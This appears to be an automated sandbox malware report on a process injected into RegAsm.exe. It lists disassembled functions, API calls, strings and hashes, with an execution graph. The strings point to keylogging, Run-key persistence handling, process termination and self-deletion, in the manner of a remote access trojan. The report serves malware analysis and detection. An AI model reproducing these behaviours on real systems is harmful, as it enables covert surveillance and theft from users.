                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                                                  • String ID: [AltL]$[AltR]
                                                                                  • API String ID: 2738857842-2658077756
                                                                                  • Opcode ID: 2bdc01cacd876c0b350abb7d408e8864ecff36be759564c8f89a1257273347cd
                                                                                  • Instruction ID: d407634c764e35d79823ffb94670adf82ecea3c262ef0a09b09082b5b6a355d5
                                                                                  • Opcode Fuzzy Hash: 2bdc01cacd876c0b350abb7d408e8864ecff36be759564c8f89a1257273347cd
                                                                                  • Instruction Fuzzy Hash: B2E0652171032052C859363D592FABE2D11CB41B64B42097FF842AB7D6DABF4D5543CF
                                                                                  APIs
                                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161E3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExecuteShell
                                                                                  • String ID: !D@$open
                                                                                  • API String ID: 587946157-1586967515
                                                                                  • Opcode ID: 4c61eaa6548ee28cdb1e2a4907ffc3a5f6acbad4bc53697dcaba2df13cd2f041
                                                                                  • Instruction ID: 3b2857edeaddefe186f4a0a52e989bb70d7a4cfa1db765b6d796ce97600c5b03
                                                                                  • Opcode Fuzzy Hash: 4c61eaa6548ee28cdb1e2a4907ffc3a5f6acbad4bc53697dcaba2df13cd2f041
                                                                                  • Instruction Fuzzy Hash: 4AE012712483059AD214EA72DC92EFEB35CAB54755F404C3FF506524E2EF3C5C49C66A
                                                                                  APIs
                                                                                  • GetKeyState.USER32(00000012), ref: 0040B6E0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: State
                                                                                  • String ID: [CtrlL]$[CtrlR]
                                                                                  • API String ID: 1649606143-2446555240
                                                                                  • Opcode ID: 5e9c90a2b5f30f0669b27174b58f532bfe2dc3a0439e10c0f003492ce4cfd8eb
                                                                                  • Instruction ID: b338140f060b4cc34328e336f8905ed3f99262ec5dadafe534bff25dd27afc5e
                                                                                  • Opcode Fuzzy Hash: 5e9c90a2b5f30f0669b27174b58f532bfe2dc3a0439e10c0f003492ce4cfd8eb
                                                                                  • Instruction Fuzzy Hash: CFE04F2160072052C5243A7D561A67A2911C7C2764F41057BE9826B7C6DABE891452DF
                                                                                  APIs
                                                                                    • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                  • __Init_thread_footer.LIBCMT ref: 00410F64
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Init_thread_footer__onexit
                                                                                  • String ID: ,kG$0kG
                                                                                  • API String ID: 1881088180-2015055088
                                                                                  • Opcode ID: 6e3451c1f808ccc17589ee43c3bbf287c043e9bd68a58e8b3248af8f7871f884
                                                                                  • Instruction ID: 52a075922dd803dc3791164d579436726ad124eb3de8ddc986de269a183bf650
                                                                                  • Opcode Fuzzy Hash: 6e3451c1f808ccc17589ee43c3bbf287c043e9bd68a58e8b3248af8f7871f884
                                                                                  • Instruction Fuzzy Hash: A8E0D8315149208EC514B729E542AC53395DB0E324B21907BF014D72D2CBAE78C28E5D
                                                                                  APIs
                                                                                  • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040D17F,00000000,004752D8,004752F0,?,pth_unenc), ref: 00413A6C
                                                                                  • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00413A80
                                                                                  Strings
                                                                                  • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A6A
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: DeleteOpenValue
                                                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                                  • API String ID: 2654517830-1051519024
                                                                                  • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                                                  • Instruction ID: 8a242acd51d06e7ce72e997358fe7bb9804e2c240f13b939b69747d851efcbee
                                                                                  • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                                                  • Instruction Fuzzy Hash: FFE0C231244208FBEF104FB1DD06FFA7B2CDB01F42F1006A9BA0692192C626CE049664
                                                                                  APIs
                                                                                  • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8B1
                                                                                  • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8DC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: DeleteDirectoryFileRemove
                                                                                  • String ID: pth_unenc
                                                                                  • API String ID: 3325800564-4028850238
                                                                                  • Opcode ID: abbea0d7173f6b15884b0e8937d7cb34f61697f5a4d448918d1cd9e56a781f81
                                                                                  • Instruction ID: ee660421d7ec44f6c6eaad5e9e1fc6482a22fb53094cf60c5c3e5a772ac54322
                                                                                  • Opcode Fuzzy Hash: abbea0d7173f6b15884b0e8937d7cb34f61697f5a4d448918d1cd9e56a781f81
                                                                                  • Instruction Fuzzy Hash: 5AE04F314006109BC610BB218854AD6335CAB04316F00497BE4A3A35A1DF38AC49D658
                                                                                  APIs
                                                                                  • TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                                  • WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ObjectProcessSingleTerminateWait
                                                                                  • String ID: pth_unenc
                                                                                  • API String ID: 1872346434-4028850238
                                                                                  • Opcode ID: a2eb2d9afd673111ff5afcc9fde18e5bb16fff8f446b795bb15600cc5347fa32
                                                                                  • Instruction ID: 30425768eaae71e8f6d4d073063fb5581f05561c6d480f36d281b696a9d2b878
                                                                                  • Opcode Fuzzy Hash: a2eb2d9afd673111ff5afcc9fde18e5bb16fff8f446b795bb15600cc5347fa32
                                                                                  • Instruction Fuzzy Hash: DBD01234149312FFD7310F60EE4DB443B589705362F140361F439552F1C7A589D4AB58
                                                                                  APIs
                                                                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D77
                                                                                  • GetLastError.KERNEL32 ref: 00440D85
                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440DE0
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ByteCharMultiWide$ErrorLast
                                                                                  • String ID:
                                                                                  • API String ID: 1717984340-0
                                                                                  • Opcode ID: b039ec4469df985fcedc89be96e173b9c6b75658958c27081834ba59c0289411
                                                                                  • Instruction ID: 51be13377619d21db21fabe69686c0ed70cae26876ac5a8e773c252addda8789
                                                                                  • Opcode Fuzzy Hash: b039ec4469df985fcedc89be96e173b9c6b75658958c27081834ba59c0289411
                                                                                  • Instruction Fuzzy Hash: 2D412670A00212AFEF218FA5C8447BBBBA4EF41310F2045AAFA59573E1DB399C31C759
                                                                                  APIs
                                                                                  • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411BC7
                                                                                  • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411C93
                                                                                  • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411CB5
                                                                                  • SetLastError.KERNEL32(0000007E,00411F2B), ref: 00411CCC
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLastRead
                                                                                  • String ID:
                                                                                  • API String ID: 4100373531-0
                                                                                  • Opcode ID: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                                                                  • Instruction ID: 65e884089caabfe283b2879acbb60db065d5dd9ad58be7743d127bf22715a70c
                                                                                  • Opcode Fuzzy Hash: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                                                                  • Instruction Fuzzy Hash: 60419D716443059FEB248F19DC84BA7B3E4FF44714F00082EEA4A876A1F738E845CB99

                                                                                  Execution Graph

                                                                                  Execution Coverage:6.2%
                                                                                  Dynamic/Decrypted Code Coverage:9.2%
                                                                                  Signature Coverage:0%
                                                                                  Total number of Nodes:2000
                                                                                  Total number of Limit Nodes:78
                                                                                  execution_graph 40395 441819 40398 430737 40395->40398 40397 441825 40399 430756 40398->40399 40410 43076d 40398->40410 40400 430774 40399->40400 40401 43075f 40399->40401 40413 43034a memcpy 40400->40413 40412 4169a7 11 API calls 40401->40412 40404 4307ce 40406 430819 memset 40404->40406 40414 415b2c 11 API calls 40404->40414 40405 43077e 40405->40404 40409 4307fa 40405->40409 40405->40410 40406->40410 40408 4307e9 40408->40406 40408->40410 40415 4169a7 11 API calls 40409->40415 40410->40397 40412->40410 40413->40405 40414->40408 40415->40410 37678 442ec6 19 API calls 37855 4152c6 malloc 37856 4152e2 37855->37856 37857 4152ef 37855->37857 37859 416760 11 API calls 37857->37859 37859->37856 37860 4466f4 37879 446904 37860->37879 37862 446700 GetModuleHandleA 37865 446710 __set_app_type __p__fmode __p__commode 37862->37865 37864 4467a4 37866 4467ac __setusermatherr 37864->37866 37867 4467b8 37864->37867 37865->37864 37866->37867 37880 4468f0 _controlfp 37867->37880 37869 4467bd _initterm __wgetmainargs _initterm 37870 44681e GetStartupInfoW 37869->37870 37871 446810 37869->37871 37873 446866 GetModuleHandleA 37870->37873 37881 41276d 37873->37881 37877 446896 exit 37878 44689d _cexit 37877->37878 37878->37871 37879->37862 37880->37869 37882 41277d 37881->37882 37924 4044a4 LoadLibraryW 37882->37924 37884 412785 37916 412789 37884->37916 37932 414b81 37884->37932 37887 4127c8 37938 412465 memset ??2@YAPAXI 37887->37938 37889 4127ea 37950 40ac21 37889->37950 37894 412813 37968 40dd07 memset 37894->37968 37895 412827 37973 40db69 memset 37895->37973 37898 412822 37994 4125b6 ??3@YAXPAX 37898->37994 37900 40ada2 _wcsicmp 37901 41283d 37900->37901 37901->37898 37904 412863 CoInitialize 37901->37904 37978 41268e 37901->37978 37998 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37904->37998 37908 41296f 38000 40b633 37908->38000 37910 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37915 412957 CoUninitialize 37910->37915 37921 4128ca 37910->37921 37915->37898 37916->37877 37916->37878 37917 4128d0 TranslateAcceleratorW 37918 412941 GetMessageW 37917->37918 37917->37921 37918->37915 37918->37917 37919 412909 IsDialogMessageW 37919->37918 37919->37921 37920 4128fd IsDialogMessageW 37920->37918 37920->37919 37921->37917 37921->37919 37921->37920 37922 41292b TranslateMessage DispatchMessageW 37921->37922 37923 41291f IsDialogMessageW 37921->37923 37922->37918 37923->37918 37923->37922 37925 4044cf GetProcAddress 37924->37925 37928 4044f7 37924->37928 37926 4044e8 FreeLibrary 37925->37926 37929 4044df 37925->37929 37927 4044f3 37926->37927 37926->37928 37927->37928 37930 404507 MessageBoxW 37928->37930 37931 40451e 37928->37931 37929->37926 37930->37884 37931->37884 37933 414b8a 37932->37933 37934 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37932->37934 38004 40a804 memset 37933->38004 37934->37887 37937 414b9e GetProcAddress 37937->37934 37940 4124e0 37938->37940 37939 412505 ??2@YAPAXI 37941 41251c 37939->37941 37944 412521 37939->37944 37940->37939 38026 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37941->38026 38015 444722 37944->38015 37949 41259b wcscpy 37949->37889 38031 40b1ab free free 37950->38031 37952 40ad76 38032 40aa04 37952->38032 37955 40a9ce malloc memcpy free free 37957 40ac5c 37955->37957 37956 40ad4b 37956->37952 38055 40a9ce 37956->38055 37957->37952 37957->37955 37957->37956 37958 40ace7 free 37957->37958 38035 40a8d0 37957->38035 38047 4099f4 37957->38047 37958->37957 37963 40a8d0 7 API calls 37963->37952 37964 40ada2 37965 40adc9 37964->37965 37967 40adaa 37964->37967 37965->37894 37965->37895 37966 40adb3 _wcsicmp 37966->37965 37966->37967 37967->37965 37967->37966 38060 40dce0 37968->38060 37970 40dd3a GetModuleHandleW 38065 40dba7 37970->38065 37974 40dce0 3 API calls 37973->37974 37975 40db99 37974->37975 38137 40dae1 37975->38137 38151 402f3a 37978->38151 37980 412766 37980->37898 37980->37904 37981 4126d3 _wcsicmp 37982 4126a8 37981->37982 37982->37980 37982->37981 37984 41270a 37982->37984 38185 4125f8 7 API calls 37982->38185 37984->37980 38154 411ac5 37984->38154 37995 4125da 37994->37995 37996 4125f0 37995->37996 37997 4125e6 DeleteObject 37995->37997 37999 40b1ab free free 37996->37999 37997->37996 37998->37910 37999->37908 38001 40b640 38000->38001 38002 40b639 free 38000->38002 38003 40b1ab free free 38001->38003 38002->38001 38003->37916 38005 40a83b GetSystemDirectoryW 38004->38005 38006 40a84c wcscpy 38004->38006 38005->38006 38011 409719 wcslen 38006->38011 38009 40a881 LoadLibraryW 38010 40a886 38009->38010 38010->37934 38010->37937 38012 409724 38011->38012 38013 409739 wcscat LoadLibraryW 38011->38013 38012->38013 38014 40972c wcscat 38012->38014 38013->38009 38013->38010 38014->38013 38016 444732 38015->38016 38017 444728 DeleteObject 38015->38017 38027 409cc3 38016->38027 38017->38016 38019 412551 38020 4010f9 38019->38020 38021 401130 38020->38021 38022 401134 GetModuleHandleW LoadIconW 38021->38022 38023 401107 wcsncat 38021->38023 38024 40a7be 38022->38024 38023->38021 38025 40a7d2 38024->38025 38025->37949 38025->38025 38026->37944 38030 409bfd memset wcscpy 38027->38030 38029 409cdb CreateFontIndirectW 38029->38019 38030->38029 38031->37957 38033 40aa14 38032->38033 38034 40aa0a free 38032->38034 38033->37964 38034->38033 38036 40a8eb 38035->38036 38037 40a8df wcslen 38035->38037 38038 40a906 free 38036->38038 38039 40a90f 38036->38039 38037->38036 38040 40a919 38038->38040 38041 4099f4 3 API calls 38039->38041 38042 40a932 38040->38042 38043 40a929 free 38040->38043 38041->38040 38045 4099f4 3 API calls 38042->38045 38044 40a93e memcpy 38043->38044 38044->37957 38046 40a93d 38045->38046 38046->38044 38048 409a41 38047->38048 38049 4099fb malloc 38047->38049 38048->37957 38051 409a37 38049->38051 38052 409a1c 38049->38052 38051->37957 38053 409a30 free 38052->38053 38054 409a20 memcpy 38052->38054 38053->38051 38054->38053 38056 40a9e7 38055->38056 38057 40a9dc free 38055->38057 38059 4099f4 3 API calls 38056->38059 38058 40a9f2 38057->38058 38058->37963 38059->38058 38084 409bca GetModuleFileNameW 38060->38084 38062 40dce6 wcsrchr 38063 40dcf5 38062->38063 38064 40dcf9 wcscat 38062->38064 38063->38064 38064->37970 38085 44db70 38065->38085 38069 40dbfd 38088 4447d9 38069->38088 38072 40dc34 wcscpy wcscpy 38114 40d6f5 38072->38114 38073 40dc1f wcscpy 38073->38072 38076 40d6f5 3 API calls 38077 40dc73 38076->38077 38078 40d6f5 3 API calls 38077->38078 38079 40dc89 38078->38079 38080 40d6f5 3 API calls 38079->38080 38081 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38080->38081 38120 40da80 38081->38120 38084->38062 38086 40dbb4 memset memset 38085->38086 38087 409bca GetModuleFileNameW 38086->38087 38087->38069 38090 4447f4 38088->38090 38089 40dc1b 38089->38072 38089->38073 38090->38089 38091 444807 ??2@YAPAXI 38090->38091 38092 44481f 38091->38092 38093 444873 _snwprintf 38092->38093 38094 4448ab wcscpy 38092->38094 38127 44474a 8 API calls 38093->38127 38096 4448bb 38094->38096 38128 44474a 8 API calls 38096->38128 38097 4448a7 38097->38094 38097->38096 38099 4448cd 38129 44474a 8 API calls 38099->38129 38101 4448e2 38130 44474a 8 API calls 38101->38130 38103 4448f7 38131 44474a 8 API calls 38103->38131 38105 44490c 38132 44474a 8 API calls 38105->38132 38107 444921 38133 44474a 8 API calls 38107->38133 38109 444936 38134 44474a 8 API calls 38109->38134 38111 44494b 38135 44474a 8 API calls 38111->38135 38113 444960 ??3@YAXPAX 38113->38089 38115 44db70 38114->38115 38116 40d702 memset GetPrivateProfileStringW 38115->38116 38117 40d752 38116->38117 38118 40d75c WritePrivateProfileStringW 38116->38118 38117->38118 38119 40d758 38117->38119 38118->38119 38119->38076 38121 44db70 38120->38121 38122 40da8d memset 38121->38122 38123 40daac LoadStringW 38122->38123 38124 40dac6 38123->38124 38124->38123 38126 40dade 38124->38126 38136 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38124->38136 38126->37898 38127->38097 38128->38099 38129->38101 38130->38103 38131->38105 38132->38107 38133->38109 38134->38111 38135->38113 38136->38124 38147 409b98 GetFileAttributesW 38137->38147 38139 40daea 38140 40db63 38139->38140 38141 40daef wcscpy wcscpy GetPrivateProfileIntW 38139->38141 38140->37900 38148 40d65d GetPrivateProfileStringW 38141->38148 38143 40db3e 38149 40d65d GetPrivateProfileStringW 38143->38149 38145 40db4f 38150 40d65d GetPrivateProfileStringW 38145->38150 38147->38139 38148->38143 38149->38145 38150->38140 38186 40eaff 38151->38186 38155 411ae2 memset 38154->38155 38156 411b8f 38154->38156 38226 409bca GetModuleFileNameW 38155->38226 38168 411a8b 38156->38168 38158 411b0a wcsrchr 38159 411b22 wcscat 38158->38159 38160 411b1f 38158->38160 38227 414770 wcscpy wcscpy wcscpy CloseHandle 38159->38227 38160->38159 38162 411b67 38228 402afb 38162->38228 38166 411b7f 38284 40ea13 SendMessageW memset SendMessageW 38166->38284 38169 402afb 27 API calls 38168->38169 38170 411ac0 38169->38170 38171 4110dc 38170->38171 38172 41113e 38171->38172 38177 4110f0 38171->38177 38309 40969c LoadCursorW SetCursor 38172->38309 38174 411143 38310 4032b4 38174->38310 38328 444a54 38174->38328 38175 4110f7 _wcsicmp 38175->38177 38176 411157 38178 40ada2 _wcsicmp 38176->38178 38177->38172 38177->38175 38331 410c46 10 API calls 38177->38331 38181 411167 38178->38181 38179 4111af 38181->38179 38182 4111a6 qsort 38181->38182 38182->38179 38185->37982 38187 40eb10 38186->38187 38199 40e8e0 38187->38199 38190 40eb6c memcpy memcpy 38193 40ebb7 38190->38193 38191 40d134 16 API calls 38191->38193 38192 40ebf2 ??2@YAPAXI ??2@YAPAXI 38194 40ec2e ??2@YAPAXI 38192->38194 38197 40ec65 38192->38197 38193->38190 38193->38191 38193->38192 38194->38197 38209 40ea7f 38197->38209 38198 402f49 38198->37982 38200 40e8f2 38199->38200 38201 40e8eb ??3@YAXPAX 38199->38201 38202 40e900 38200->38202 38203 40e8f9 ??3@YAXPAX 38200->38203 38201->38200 38204 40e90a ??3@YAXPAX 38202->38204 38206 40e911 38202->38206 38203->38202 38204->38206 38205 40e931 ??2@YAPAXI ??2@YAPAXI 38205->38190 38206->38205 38207 40e921 ??3@YAXPAX 38206->38207 38208 40e92a ??3@YAXPAX 38206->38208 38207->38208 38208->38205 38210 40aa04 free 38209->38210 38211 40ea88 38210->38211 38212 40aa04 free 38211->38212 38213 40ea90 38212->38213 38214 40aa04 free 38213->38214 38215 40ea98 38214->38215 38216 40aa04 free 38215->38216 38217 40eaa0 38216->38217 38218 40a9ce 4 API calls 38217->38218 38219 40eab3 38218->38219 38220 40a9ce 4 API calls 38219->38220 38221 40eabd 38220->38221 38222 40a9ce 4 API calls 38221->38222 38223 40eac7 38222->38223 38224 40a9ce 4 API calls 38223->38224 38225 40ead1 38224->38225 38225->38198 38226->38158 38227->38162 38285 40b2cc 38228->38285 38230 402b0a 38231 40b2cc 27 API calls 38230->38231 38232 402b23 38231->38232 38233 40b2cc 27 API calls 38232->38233 38234 402b3a 38233->38234 38235 40b2cc 27 API calls 38234->38235 38236 402b54 38235->38236 38237 40b2cc 27 API calls 38236->38237 38238 402b6b 38237->38238 38239 40b2cc 27 API calls 38238->38239 38240 402b82 38239->38240 38241 40b2cc 27 API calls 38240->38241 38242 402b99 38241->38242 38243 40b2cc 27 API calls 38242->38243 38244 402bb0 38243->38244 38245 40b2cc 27 API calls 38244->38245 38246 402bc7 38245->38246 38247 40b2cc 27 API calls 38246->38247 38248 402bde 38247->38248 38249 40b2cc 27 API calls 38248->38249 38250 402bf5 38249->38250 38251 40b2cc 27 API calls 38250->38251 38252 402c0c 38251->38252 38253 40b2cc 27 API calls 38252->38253 38254 402c23 38253->38254 38255 40b2cc 27 API calls 38254->38255 38256 402c3a 38255->38256 38257 40b2cc 27 API calls 38256->38257 38258 402c51 38257->38258 38259 40b2cc 27 API calls 38258->38259 38260 402c68 38259->38260 38261 40b2cc 27 API calls 38260->38261 38262 402c7f 38261->38262 38263 40b2cc 27 API calls 38262->38263 38264 402c99 38263->38264 38265 40b2cc 27 API calls 38264->38265 38266 402cb3 38265->38266 38267 40b2cc 27 API calls 38266->38267 38268 402cd5 38267->38268 38269 40b2cc 27 API calls 38268->38269 38270 402cf0 38269->38270 38271 40b2cc 27 API calls 38270->38271 38272 402d0b 38271->38272 38273 40b2cc 27 API calls 38272->38273 38274 402d26 38273->38274 38275 40b2cc 27 API calls 38274->38275 38276 402d3e 38275->38276 38277 40b2cc 27 API calls 38276->38277 38278 402d59 38277->38278 38279 40b2cc 27 API calls 38278->38279 38280 402d78 38279->38280 38281 40b2cc 27 API calls 38280->38281 38282 402d93 38281->38282 38283 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38282->38283 38283->38166 38284->38156 38288 40b58d 38285->38288 38287 40b2d1 38287->38230 38289 40b5a4 GetModuleHandleW FindResourceW 38288->38289 38290 40b62e 38288->38290 38291 40b5c2 LoadResource 38289->38291 38293 40b5e7 38289->38293 38290->38287 38292 40b5d0 SizeofResource LockResource 38291->38292 38291->38293 38292->38293 38293->38290 38301 40afcf 38293->38301 38295 40b608 memcpy 38304 40b4d3 memcpy 38295->38304 38297 40b61e 38305 40b3c1 18 API calls 38297->38305 38299 40b626 38306 40b04b 38299->38306 38302 40b04b ??3@YAXPAX 38301->38302 38303 40afd7 ??2@YAPAXI 38302->38303 38303->38295 38304->38297 38305->38299 38307 40b051 ??3@YAXPAX 38306->38307 38308 40b05f 38306->38308 38307->38308 38308->38290 38309->38174 38311 4032c4 38310->38311 38312 40b633 free 38311->38312 38313 403316 38312->38313 38332 44553b 38313->38332 38317 403480 38530 40368c 15 API calls 38317->38530 38319 403489 38320 40b633 free 38319->38320 38321 403495 38320->38321 38321->38176 38322 4033a9 memset memcpy 38323 4033ec wcscmp 38322->38323 38324 40333c 38322->38324 38323->38324 38324->38317 38324->38322 38324->38323 38528 4028e7 11 API calls 38324->38528 38529 40f508 6 API calls 38324->38529 38327 403421 _wcsicmp 38327->38324 38329 444a64 FreeLibrary 38328->38329 38330 444a83 38328->38330 38329->38330 38330->38176 38331->38177 38333 445548 38332->38333 38334 445599 38333->38334 38531 40c768 38333->38531 38335 4455a8 memset 38334->38335 38343 4457f2 38334->38343 38614 403988 38335->38614 38341 4455e5 38356 445672 38341->38356 38361 44560f 38341->38361 38346 445854 38343->38346 38716 403e2d memset memset memset memset memset 38343->38716 38344 4458bb memset memset 38348 414c2e 15 API calls 38344->38348 38390 4458aa 38346->38390 38739 403c9c memset memset memset memset memset 38346->38739 38347 44595e memset memset 38351 414c2e 15 API calls 38347->38351 38352 4458f9 38348->38352 38350 445a00 memset memset 38762 414c2e 38350->38762 38359 44599c 38351->38359 38360 40b2cc 27 API calls 38352->38360 38353 44558c 38598 444b06 38353->38598 38354 44557a 38354->38353 38811 4136c0 CoTaskMemFree 38354->38811 38625 403fbe memset memset memset memset memset 38356->38625 38369 40b2cc 27 API calls 38359->38369 38370 445909 38360->38370 38372 4087b3 337 API calls 38361->38372 38363 445bca 38371 445c8b memset memset 38363->38371 38427 445cf0 38363->38427 38364 445b38 memset memset memset 38375 445bd4 38364->38375 38376 445b98 38364->38376 38365 445849 38827 40b1ab free free 38365->38827 38384 4459ac 38369->38384 38381 409d1f 6 API calls 38370->38381 38385 414c2e 15 API calls 38371->38385 38382 445621 38372->38382 38373 445585 38812 41366b FreeLibrary 38373->38812 38374 44589f 38828 40b1ab free free 38374->38828 38379 414c2e 15 API calls 38375->38379 38376->38375 38387 445ba2 38376->38387 38377 40b2cc 27 API calls 38389 445a4f 38377->38389 38392 445be2 38379->38392 38380 403335 38527 4452e5 45 API calls 38380->38527 38395 445919 38381->38395 38813 4454bf 20 API calls 38382->38813 38383 445823 38383->38365 38405 4087b3 337 API calls 38383->38405 38396 409d1f 6 API calls 38384->38396 38397 445cc9 38385->38397 38898 4099c6 wcslen 38387->38898 38388 4456b2 38815 40b1ab free free 38388->38815 38777 409d1f wcslen wcslen 38389->38777 38390->38344 38424 44594a 38390->38424 38403 40b2cc 27 API calls 38392->38403 38393 445d3d 38423 40b2cc 27 API calls 38393->38423 38394 445d88 memset memset memset 38406 414c2e 15 API calls 38394->38406 38829 409b98 GetFileAttributesW 38395->38829 38407 4459bc 38396->38407 38408 409d1f 6 API calls 38397->38408 38398 445879 38398->38374 38409 4087b3 337 API calls 38398->38409 38400 445bb3 38901 445403 memset 38400->38901 